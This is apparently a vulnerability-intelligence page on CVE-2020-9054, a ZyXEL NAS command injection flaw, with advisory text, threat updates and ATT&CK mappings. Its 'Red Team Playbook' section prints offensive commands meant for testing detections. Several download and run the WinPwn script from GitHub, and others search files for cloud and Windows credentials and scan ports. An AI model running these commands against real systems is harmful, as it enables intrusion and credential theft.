CVE-2020-9054

CRITICAL CISA KEV POC TTE 553d Pub 04/03 Upd 21/10

Overview

This vulnerability is a pre-authentication command injection affecting ZyXEL NAS devices' weblogin.cgi CGI executable. The root cause is improper sanitization of the username parameter passed to weblogin.cgi, allowing injection of shell commands. The flaw resides in the web server component that processes authentication requests, enabling command execution within the web server's privilege context.

Vulnerability Description

Multiple ZyXEL network-attached storage (NAS) devices running firmware version 5.21 contain a pre-authentication command injection vulnerability, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable device. ZyXEL NAS devices achieve authentication by using the weblogin.cgi CGI executable. This program fails to properly sanitize the username parameter that is passed to it. If the username parameter contains certain characters, it can allow command injection with the privileges of the web server that runs on the ZyXEL device. Although the web server does not run as the root user, ZyXEL devices include a setuid utility that can be leveraged to run any command with root privileges. As such, it should be assumed that exploitation of this vulnerability can lead to remote code execution with root privileges. By sending a specially-crafted HTTP POST or GET request to a vulnerable ZyXEL device, a remote, unauthenticated attacker may be able to execute arbitrary code on the device. This may happen by directly connecting to a device if it is directly exposed to an attacker. However, there are ways to trigger such crafted requests even if an attacker does not have direct connectivity to a vulnerable devices. For example, simply visiting a website can result in the compromise of any ZyXEL device that is reachable from the client system. Affected products include: NAS326 before firmware V5.21(AAZF.7)C0 NAS520 before firmware V5.21(AASZ.3)C0 NAS540 before firmware V5.21(AATB.4)C0 NAS542 before firmware V5.21(ABAG.4)C0 ZyXEL has made firmware updates available for NAS326, NAS520, NAS540, and NAS542 devices. Affected models that are end-of-support: NSA210, NSA220, NSA220+, NSA221, NSA310, NSA310S, NSA320, NSA320S, NSA325 and NSA325v2

Impact

An unauthenticated remote attacker can execute arbitrary commands with root privileges on affected ZyXEL NAS devices. This enables full system compromise, including data theft, device manipulation, or persistent backdoors. No user interaction or authentication is required, and exploitation can occur remotely if the device is exposed or indirectly reachable via client systems. The vulnerability can lead to complete loss of confidentiality, integrity, and availability of the device and stored data.

Solution

ZyXEL has released firmware updates addressing this vulnerability in versions 5.21(AAZF.7)C0 for NAS326, 5.21(AASZ.3)C0 for NAS520, 5.21(AATB.4)C0 for NAS540, and 5.21(ABAG.4)C0 for NAS542. Users should upgrade to these firmware versions immediately. Detailed patch instructions and advisories are available at ZyXEL's official support page: https://www.zyxel.com/support/remote-code-execution-vulnerability-of-NAS-products.shtml. End-of-support models are not receiving updates and should be replaced or isolated from networks.

EPSS vs KEV Prediction — Evolution (30 days)

Full Analysis

A critical pre-authentication command injection vulnerability exists in multiple ZyXEL network-attached storage (NAS) devices running specific firmware versions. This flaw arises from inadequate sanitization of the username parameter in the weblogin.cgi CGI executable. An attacker can exploit this vulnerability by crafting malicious HTTP requests that include specially formatted characters in the username field. The web server, which operates with limited privileges, can inadvertently execute arbitrary commands due to the presence of a setuid utility on the device. This utility allows the execution of commands with root privileges, thereby escalating the attacker's access level and potentially compromising the entire device.

Exploitation of this vulnerability can occur through various attack vectors. A remote, unauthenticated attacker can directly connect to a vulnerable device if it is exposed to the internet. However, the attack can also be executed indirectly; for instance, by manipulating web traffic or leveraging cross-site scripting (XSS) vulnerabilities on a third-party website that interacts with the ZyXEL devices. In such scenarios, merely visiting a compromised site could trigger the crafted requests, leading to the exploitation of any reachable ZyXEL NAS device. This versatility in attack vectors significantly increases the risk of exploitation, as it broadens the potential attack surface beyond direct access to the vulnerable devices.

The real-world impact of this vulnerability is substantial, particularly for organizations relying on ZyXEL NAS devices for data storage and management. Successful exploitation could lead to unauthorized access to sensitive data, loss of integrity, and disruption of services. The ability to execute arbitrary code with root privileges means that an attacker could manipulate system configurations, install malware, or exfiltrate confidential information. For businesses, the consequences could include reputational damage, financial losses, and regulatory penalties, especially if sensitive customer data is compromised. The high CVSS score of 9.8 underscores the severity of the threat and the urgent need for remediation.

To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regularly updating firmware to the latest versions provided by ZyXEL is crucial, as these updates often contain patches for known vulnerabilities. Additionally, network segmentation can help limit exposure by isolating vulnerable devices from the internet and reducing the attack surface. Employing intrusion detection systems (IDS) can aid in identifying unusual traffic patterns indicative of exploitation attempts. Organizations should also conduct routine security assessments and vulnerability scans to ensure that all devices are properly configured and up to date.

In conclusion, the command injection vulnerability in ZyXEL NAS devices poses a significant threat to both individual users and organizations. The potential for remote code execution with root privileges highlights the critical need for immediate action. By understanding the technical details, attack vectors, and real-world implications, organizations can better prepare themselves to defend against such vulnerabilities. Implementing robust detection and mitigation strategies will not only protect sensitive data but also enhance overall cybersecurity posture in an increasingly complex threat landscape.




CSURFACE threat intelligence has detected a slight increase in activity exploiting CVE-2020-9054, indicating continued interest from threat actors targeting ZyXEL NAS devices. Although the overall exploitability score remains stable, this subtle rise in telemetry suggests that adversaries may be probing vulnerable systems more frequently or refining their attack methods. The availability of publicly accessible proof-of-concept code continues to lower the barrier for exploitation, potentially expanding the pool of attackers capable of leveraging this command injection flaw. While there is no current evidence of ransomware groups adopting this vulnerability, the persistent exploitation attempts underscore the ongoing risk to organizations relying on affected ZyXEL firmware versions. Consequently, the threat level remains critical, with a sustained potential for remote code execution that could lead to significant operational disruption or data compromise.



Update 2 — June 07, 2026

CSURFACE threat intelligence has identified a slight increase in exploitation attempts targeting the CVE-2020-9054 vulnerability in ZyXEL NAS devices. While the overall trend remains stable, this uptick suggests persistent attacker interest and ongoing probing of vulnerable systems. The availability of publicly accessible proof-of-concept code continues to facilitate exploitation efforts by lowering technical barriers, which may contribute to the sustained activity observed in our telemetry. Although there is still no confirmed linkage to ransomware campaigns, the consistent exploitation attempts underscore the vulnerability’s enduring appeal as a vector for remote code execution. This development maintains the threat level at critical, emphasizing the need for continued vigilance given the potential for operational disruption or data compromise stemming from successful attacks.



Update 3 — June 15, 2026

CSURFACE threat intelligence has detected a notable surge in exploitation attempts targeting the CVE-2020-9054 vulnerability in ZyXEL NAS devices. This increase is reflected in a rising trend of telemetry signals and a near-maximal EPSS score, indicating heightened likelihood of successful exploitation in the wild. The persistence of publicly available proof-of-concept code continues to lower the technical barriers for attackers, sustaining adversary interest and activity. Although there remains no confirmed association with ransomware campaigns, the escalation in exploitation attempts underscores the vulnerability’s ongoing attractiveness as a remote code execution vector. This development elevates the urgency for defenders to maintain heightened monitoring and response capabilities, as the risk of operational disruption or data compromise remains critically high.



Update 4 — July 05, 2026

CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2020-9054, indicating sustained adversary interest in this critical ZyXEL NAS vulnerability. While the overall trend remains stable, the modest uptick in activity suggests that threat actors continue to probe for vulnerable devices, leveraging publicly available proof-of-concept code to facilitate remote code execution. This persistence underscores the vulnerability’s enduring appeal as an attack vector, particularly given its pre-authentication nature and high severity rating. Although there is still no confirmed linkage to ransomware campaigns, the ongoing exploitation attempts maintain a heightened risk posture for affected organizations. Consequently, defenders should recognize that the threat level remains critically high, with adversaries actively seeking to exploit this flaw to gain unauthorized access and potentially disrupt operations or exfiltrate data.

Affected Products (27)

Vendor Product Version CPE
zyxel Zyxel Nas326 Firmware All cpe:2.3:o:zyxel:nas326_firmware:*:*:*:*:*:*:*:*
zyxel Zyxel Nas520 Firmware All cpe:2.3:o:zyxel:nas520_firmware:*:*:*:*:*:*:*:*
zyxel Zyxel Nas540 Firmware All cpe:2.3:o:zyxel:nas540_firmware:*:*:*:*:*:*:*:*
zyxel Zyxel Nas542 Firmware All cpe:2.3:o:zyxel:nas542_firmware:*:*:*:*:*:*:*:*
zyxel Zyxel Atp100 Firmware All cpe:2.3:o:zyxel:atp100_firmware:*:*:*:*:*:*:*:*
zyxel Zyxel Atp200 Firmware All cpe:2.3:o:zyxel:atp200_firmware:*:*:*:*:*:*:*:*
zyxel Zyxel Atp500 Firmware All cpe:2.3:o:zyxel:atp500_firmware:*:*:*:*:*:*:*:*
zyxel Zyxel Atp800 Firmware All cpe:2.3:o:zyxel:atp800_firmware:*:*:*:*:*:*:*:*
zyxel Zyxel Usg20-Vpn Firmware All cpe:2.3:o:zyxel:usg20-vpn_firmware:*:*:*:*:*:*:*:*
zyxel Zyxel Usg20w-Vpn Firmware All cpe:2.3:o:zyxel:usg20w-vpn_firmware:*:*:*:*:*:*:*:*
zyxel Zyxel Usg40 Firmware All cpe:2.3:o:zyxel:usg40_firmware:*:*:*:*:*:*:*:*
zyxel Zyxel Usg40w Firmware All cpe:2.3:o:zyxel:usg40w_firmware:*:*:*:*:*:*:*:*
zyxel Zyxel Usg60 Firmware All cpe:2.3:o:zyxel:usg60_firmware:*:*:*:*:*:*:*:*
zyxel Zyxel Usg60w Firmware All cpe:2.3:o:zyxel:usg60w_firmware:*:*:*:*:*:*:*:*
zyxel Zyxel Usg110 Firmware All cpe:2.3:o:zyxel:usg110_firmware:*:*:*:*:*:*:*:*
zyxel Zyxel Usg210 Firmware All cpe:2.3:o:zyxel:usg210_firmware:*:*:*:*:*:*:*:*
zyxel Zyxel Usg310 Firmware All cpe:2.3:o:zyxel:usg310_firmware:*:*:*:*:*:*:*:*
zyxel Zyxel Usg1100 Firmware All cpe:2.3:o:zyxel:usg1100_firmware:*:*:*:*:*:*:*:*
zyxel Zyxel Usg1900 Firmware All cpe:2.3:o:zyxel:usg1900_firmware:*:*:*:*:*:*:*:*
zyxel Zyxel Usg2200 Firmware All cpe:2.3:o:zyxel:usg2200_firmware:*:*:*:*:*:*:*:*
+7 additional CPEs
Warning: The exploits and proof-of-concept (PoC) code listed below are sourced from third-party public repositories. CSURFACE assumes no responsibility for the content, accuracy, or safety of these resources. Use at your own risk. Learn more

GitHub PoCs (1)

Repository Author Stars Forks Date Link
darrenmartyn/CVE-2020-9054
CVE-2020-9054 PoC for Zyxel
darrenmartyn 3 0 2021-09-09 View
Exploited in Wild CONFIRMED
Ransomware NOT ASSOCIATED
Attacker Interest MEDIUM
Sightings Few sightings

Threat Feed

32 events
2026-07-10
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-08
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-07
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-06
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-05
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-04
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-03
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-02
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-01
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-30
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-29
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-28
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-27
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-26
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-25
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-23
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-21
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-18
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-17
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-16
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-15
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-14
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-13
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-12
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-11
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-10
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-09
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-08
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-05
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2022-03-25
Added to CISA KEV Catalog

CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog

2021-09-09
PoC Published (1 GitHub repositories)

Proof-of-concept code is publicly available for this vulnerability

Likely Kill Chain

Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.

Applicable Out of scope
Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Priv. Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Lateral Movement
TA0008
Collection
TA0009
Impact
TA0040

Kill chain derived from the ML classifier.

Attack Vectors ML

OS Command Injection
100% command_injection
Remote Code Execution
67% rce
Authentication Bypass
52% auth_bypass

MITRE ATT&CK Techniques (6)

The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.

ID Name Stage Tactics Platforms Link
T1190 Exploit Public-Facing Application Initial Access initial-access Containers, ESXi, IaaS, Linux, macOS, Network Devices, Windows
T1059 Command and Scripting Interpreter Kill Chain execution ESXi, IaaS, Identity Provider, Linux, macOS, Network Devices, Office Suite, Windows
T1542.001 System Firmware Kill Chain persistence, defense-evasion Windows, Network Devices
T1552.001 Credentials In Files Kill Chain credential-access Containers, IaaS, Linux, macOS, Windows
T1046 Network Service Discovery Kill Chain discovery Containers, IaaS, Linux, macOS, Network Devices, Windows
T1021.004 SSH Kill Chain lateral-movement ESXi, Linux, macOS

CAPEC Attack Patterns ML

ID Name ML Conf. Likelihood Severity Link
CAPEC-88 OS Command Injection
58%
High High
CAPEC-6 Argument Injection
51%
High High
CAPEC-43 Exploiting Multiple Input Interpretation Layers
51%
Medium High

Red Team Playbook

33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.

T1021.004 ESXi - Enable SSH via PowerCLI Windows PowerShell Privileged
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
Command (PowerShell)
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
T1021.004 ESXi - Enable SSH via VIM-CMD Windows CMD
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
Command (CMD)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
T1046 Network Service Discovery for Containers containers Shell
Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and...
Command (Shell)
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
T1046 Port Scan Linux, macOS Bash
Scan ports to check for listening ports. Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout.
Command (Bash)
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
T1046 Port Scan NMap for Windows Windows PowerShell Privileged
Scan ports to check for listening ports for the local host 127.0.0.1
Command (PowerShell)
nmap #{host_to_scan}
T1046 Port Scan Nmap Linux, macOS Shell Privileged
Scan ports to check for listening ports with Nmap. Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
Command (Shell)
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
T1046 Port Scan using nmap (Port range) Linux, macOS Shell Privileged
Scan multiple ports to check for listening ports with nmap
Command (Shell)
nmap -Pn -sV -p #{port_range} #{host}
T1046 Port Scan using python Windows PowerShell
Scan ports to check for listening ports with python
Command (PowerShell)
python "#{filename}" -i #{host_ip}
T1046 Port-Scanning /24 Subnet with PowerShell Windows PowerShell
Scanning common ports in a /24 subnet. If no IP address for the target subnet is specified the test tries to determine the attacking machine's "primary" IPv4 address first and then scans that address with a /24 netmask. The connection attempts to use a timeout parameter in...
Command (PowerShell)
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
    $ip_list = $ipAddr -split ","
    $ip_list = $ip_list.ForEach({ $_.Trim() })
    Write-Host "[i] IP Address List: $ip_list"

    $ports = #{port_list}

    foreach ($ip in $ip_list) {
        foreach ($port in $ports) {
            Write-Host "[i] Establishing connection to: $ip : $port"
            try {
                $tcp = New-Object Net.Sockets.TcpClient
                $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
            } catch {}
            if ($tcp.Connected) {
                $tcp.Close()
                Write-Host "Port $port is open on $ip"
            }
        }
    }
} elseif ($ipAddr -notlike "*,*") {
    if ($ipAddr -eq "") {
        # Assumes the "primary" interface is shown at the top
        $interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
        Write-Host "[i] Using Interface $interface"
        $ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
    }
    Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
    $subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
    # Always assumes /24 subnet
    Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"

    $ports = #{port_list}
    $subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }

    foreach ($ip in $subnetIPs) {
        foreach ($port in $ports) {
            try {
                $tcp = New-Object Net.Sockets.TcpClient
                $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
            } catch {}
            if ($tcp.Connected) {
                $tcp.Close()
                Write-Host "Port $port is open on $ip"
            }
        }
    }
} else {
    Write-Host "[Error] Invalid Inputs"
    exit 1
}
T1046 Remote Desktop Services Discovery via PowerShell Windows PowerShell Privileged
Availability of remote desktop services can be checked using get- cmdlet of PowerShell
Command (PowerShell)
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
T1046 WinPwn - MS17-10 Windows PowerShell
Search for MS17-10 vulnerable Windows Servers in the domain using powerSQL function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
T1046 WinPwn - bluekeep Windows PowerShell
Search for bluekeep vulnerable Windows Systems in the domain using bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds in testing on a small domain).
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
T1046 WinPwn - fruit Windows PowerShell
Search for potentially vulnerable web apps (low hanging fruits) using fruit function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
T1046 WinPwn - spoolvulnscan Windows PowerShell
Start MS-RPRN RPC Service Scan using spoolvulnscan function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
T1059 AutoIt Script Execution Windows PowerShell
An adversary may attempt to execute suspicious or malicious script using AutoIt software instead of regular terminal like powershell or cmd. Calculator will popup when the script is executed successfully.
Command (PowerShell)
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
T1542.001 UEFI Persistence via Wpbbin.exe File Creation Windows PowerShell Privileged
Creates Wpbbin.exe in %systemroot%. This technique can be used for UEFI-based pre-OS boot persistence mechanisms. - https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c -...
Command (PowerShell)
echo "Creating %systemroot%\wpbbin.exe"      
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
T1552.001 Access unattend.xml Windows CMD Privileged
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.
Command (CMD)
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
T1552.001 Extract Browser and System credentials with LaZagne macOS Bash Privileged
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
Command (Bash)
python2 laZagne.py all
T1552.001 Extract passwords with grep Linux, macOS Shell
Extracting credentials from files
Command (Shell)
grep -ri password #{file_path}
exit 0
T1552.001 Extracting passwords with findstr Windows PowerShell
Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
Command (PowerShell)
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
T1552.001 Find AWS credentials Linux, macOS Shell
Find local AWS credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
T1552.001 Find Azure credentials Linux, macOS Shell
Find local Azure credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
T1552.001 Find GCP credentials Linux, macOS Shell
Find local Google Cloud Platform credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
T1552.001 Find OCI credentials Linux, macOS Shell
Find local Oracle cloud credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
T1552.001 Find and Access Github Credentials Linux, macOS Bash
This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
Command (Bash)
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
T1552.001 List Credential Files via Command Prompt Windows CMD Privileged
Via Command Prompt,list files where credentials are stored in Windows Credential Manager
Command (CMD)
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
T1552.001 List Credential Files via PowerShell Windows PowerShell Privileged
Via PowerShell,list files where credentials are stored in Windows Credential Manager
Command (PowerShell)
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
T1552.001 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials Windows PowerShell
Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive  
T1552.001 WinPwn - SessionGopher Windows PowerShell
Launches SessionGopher on this system via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
T1552.001 WinPwn - Snaffler Windows PowerShell
Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
T1552.001 WinPwn - passhunt Windows PowerShell
Search for Passwords on this system using passhunt via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
T1552.001 WinPwn - powershellsensitive Windows PowerShell
Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
T1552.001 WinPwn - sensitivefiles Windows PowerShell
Search for sensitive files on this local system using the SensitiveFiles function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput

Detection & Response Rules

No detection or response rules found for this CVE.

No news articles found for this CVE.

References (7)

Title Tags URL
nvd.nist.gov
NVD reference
https://nvd.nist.gov/vuln/detail/CVE-2020-9054
cwe.mitre.org
GitHub CVE x_refsource_MISC
https://cwe.mitre.org/data/definitions/78.html
zyxel.com
GitHub CVE x_refsource_CONFIRM
https://www.zyxel.com/support/remote-code-execution-vulnerability-of-NAS-products.shtml
kb.cert.org
GitHub CVE third-party-advisory x_refsource_CERT-VN
https://kb.cert.org/vuls/id/498544/
kb.cert.org
GitHub CVE x_refsource_MISC
https://kb.cert.org/artifacts/cve-2020-9054.html
krebsonsecurity.com
GitHub CVE x_refsource_MISC
https://krebsonsecurity.com/2020/02/zyxel-fixes-0day-in-network-storage-devices/
cisa.gov
NVD API US Government Resource
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-9054